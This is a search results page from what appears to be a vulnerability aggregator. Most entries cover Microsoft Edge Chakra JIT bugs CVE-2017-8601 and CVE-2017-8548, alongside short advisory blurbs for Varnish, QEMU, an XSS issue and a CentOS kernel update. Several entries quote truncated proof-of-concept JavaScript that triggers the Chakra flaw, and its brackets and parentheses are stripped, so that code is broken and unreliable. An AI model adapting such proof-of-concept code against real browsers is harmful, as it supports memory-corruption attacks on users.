Lucene search

2514 matches found

0day.today
added 2017/08/18 12:0 a.m., 38 views

Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3 Exploit

Exploit for windows platform in category dos / poc 'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main let a = 1.1, 2.2; let b = new Uint32Array100; for let i = 0; i a0 = ; return 0; ; a0.toString; main; // Tested on Microsoft Edge 40.15063.0.0Insider...

7.6 CVSS, 7.8 AI score, 0.81187 EPSS
Exploits: 5
0day.today
added 2017/08/17 12:0 a.m., 48 views

Microsoft Edge Chakra Incorrect Jit Optimization Exploit

Yet another finding that the fix for an incorrect jit optimization with TypedArray setter in Microsoft Edge Chakra may not be sufficient. Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter 3 CVE-2017-8601 Coincidentally, Microsoft released the patch for the issue 1290 the d...

7.6 CVSS, 7.6 AI score, 0.81187 EPSS
Exploits: 5
Packet Storm
added 2017/08/17 12:0 a.m., 32 views

Microsoft Edge Chakra Incorrect Jit Optimization

Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter 3 CVE-2017-8601 Coincidentally, Microsoft released the patch for the issue 1290 the day after I reported it. But it seems they fixed it incorrectly again. This time, "funca, b, i;" is replaced with "funca, b, ;". PoC: 'use...

7.6 CVSS, 0.5 AI score, 0.81187 EPSS
Exploits: 5
Exploit DB
added 2017/08/17 12:0 a.m., 38 views

Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3

'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main let a = 1.1, 2.2; let b = new Uint32Array100; for let i = 0; i a0 = ; return 0; ; a0.toString; main; // Tested on Microsoft Edge 40.15063.0.0Insider Preview...

7.4 AI score
Exploits: 0
seebug.org
added 2017/08/17 12:0 a.m., 34 views

Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #3(CVE-2017-8601)

Coincidentally, Microsoft released the patch for the issue 1290 the day after I reported it. But it seems they fixed it incorrectly again. This time, "funca, b, i;" is replaced with "funca, b, ;". PoC: 'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main...

7.6 CVSS, 7.6 AI score, 0.81187 EPSS
Exploits: 5
seebug.org
added 2017/08/17 12:0 a.m., 65 views

Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #2(CVE-2017-8548)

I think the fix for 1045 is incorrect. Here's the original PoC. 'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main var a = 1.1, 2.2; var b = new Uint32Array100; // force to optimize for var i = 0; i a0 = ; return 0; ; a0.toString; main; I just changed...

7.6 CVSS, 7.6 AI score, 0.74995 EPSS
Exploits: 4
exploitpack
added 2017/08/17 12:0 a.m., 19 views

Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3

Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter 3 'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main let a = 1.1, 2.2; let b = new Uint32Array100; for let i = 0; i a0 = ; return 0; ; a0.toString; main; // Tested on...

0.8 AI score
Exploits: 0
0day.today
added 2017/08/17 12:0 a.m., 41 views

Microsoft Edge Chakra Incorrect Jit Optimization Exploit

This is a follow-up finding that the fix for an incorrect jit optimization with TypedArray setter in Microsoft Edge Chakra may not be sufficient. Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter 2 CVE-2017-8548 I think the fix for 1045 is incorrect. Here's the original Po...

7.6 CVSS, 7.6 AI score, 0.74995 EPSS
Exploits: 4
Exploit DB
added 2017/08/17 12:0 a.m., 19 views

Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter #2

a0 = ; return 0; ; a0.toString; main; I just changed "var b = new Uint32Array100;" to "var b = new Uint32Array0;", and it worked well. PoC: -- 'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main var a = 1.1, 2.2; var b = new Uint32Array0; // 0 // force t...

7.4 AI score
Exploits: 0
exploitpack
added 2017/08/17 12:0 a.m., 12 views

Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter #2

Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter 2 a0 = ; return 0; ; a0.toString; main; I just changed "var b = new Uint32Array100;" to "var b = new Uint32Array0;", and it worked well. PoC: -- 'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-32...

1.2 AI score
Exploits: 0
Packet Storm
added 2017/08/16 12:0 a.m., 45 views

Microsoft Edge Chakra Incorrect Jit Optimization

Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter 2 CVE-2017-8548 I think the fix for 1045 is incorrect. Here's the original PoC. 'use strict'; function funca, b, c a0 = 1.2; b0 = c; a1 = 2.2; a0 = 2.3023e-320; function main var a = 1.1, 2.2; var b = new Uint32Array100; //...

7.6 CVSS, 0.5 AI score, 0.74995 EPSS
Exploits: 4
Filippo.io
added 2017/08/15 12:20 p.m., 68 views

rustgo: calling Rust from Go with near-zero overhead

Go has good support for calling into assembly, and a lot of the fast cryptographic code in the stdlib is carefully optimized assembly, bringing speedups of over 20 times. However, writing assembly code is hard, reviewing it is possibly harder, and cryptography is unforgiving. Wouldn't it ...

6.9 AI score
Exploits: 0
Fedora
added 2017/08/14 9:54 p.m., 23 views

[SECURITY] Fedora 26 Update: varnish-5.1.3-2.fc26

This is Varnish Cache, a high-performance HTTP accelerator. Varnish Cache stores web pages in memory so web servers don't have to create the same web page over and over again. Varnish Cache serves pages much faster than any application server; giving the website a...

7.5 CVSS, 0.7 AI score, 0.01419 EPSS
Exploits: 0
RedHat Linux
added 2017/08/01 9:17 p.m., 1 views

Qemu: i386: leakage of stack memory to guest in kvmvapic.c

An information-exposure flaw was found in Quick Emulator (QEMU) in Task Priority Register (TPR) optimizations for 32-bit Windows guests. The flaw could occur while accessing TPR. A privileged user inside a guest could use this issue to read portions of the host memory...

6.5 CVSS, 7.3 AI score, 0.00085 EPSS
Exploits: 0, References: 4
Veracode
added 2017/07/27 10:23 p.m., 20 views

Cross-site Scripting (XSS)

Concrete5 is vulnerable to cross-site scripting (XSS) attacks. A malicious user can inject and execute arbitrary web script because the library does not sanitize its parameters before rendering them for display. The following fields are affected: bannedword in...

4.3 CVSS, 5.7 AI score, 0.00393 EPSS
Exploits: 2, References: 8, Affected Software: 1
Citrix
added 2017/07/25 12:0 a.m., 9 views

How To Define Page File Size and Placement in Citrix App Layering 4.x

To provide Citrix customers and users a process to define page file size and location when using Citrix App Layering...

7 AI score
Exploits: 0
Zero Day Initiative
added 2017/07/11 12:0 a.m., 28 views

Microsoft Chakra Array JIT Optimization Type Confusion Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling o...

6.8 CVSS, 7.8 AI score, 0.81187 EPSS
Exploits: 5, References: 1
Zero Day Initiative
added 2017/07/11 12:0 a.m., 43 views

Microsoft Chakra Typed Array JIT Optimization Use-After-Free Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Chakra. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the generation ...

6.8 CVSS, 7.9 AI score, 0.81187 EPSS
Exploits: 5, References: 1
Tenable Nessus
added 2017/06/30 12:0 a.m., 207 views

CentOS 7 : kernel (CESA-2017:1615)

An update for kernel is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from th...

10 CVSS, 6.4 AI score, 0.21519 EPSS
Exploits: 0, References: 6
Citrix
added 2017/06/29 12:0 a.m., 5 views

Unidesk Recipe for NP Desktop Logon Time Optimization v3

One very popular use case for VDI is for kiosk or lab machines. Uses for these types of desktops include classroom labs, library access and general computing in schools and corporations. Architects and Administrators of these types of use cases generally want to be able to define default...

6.8 AI score
Exploits: 0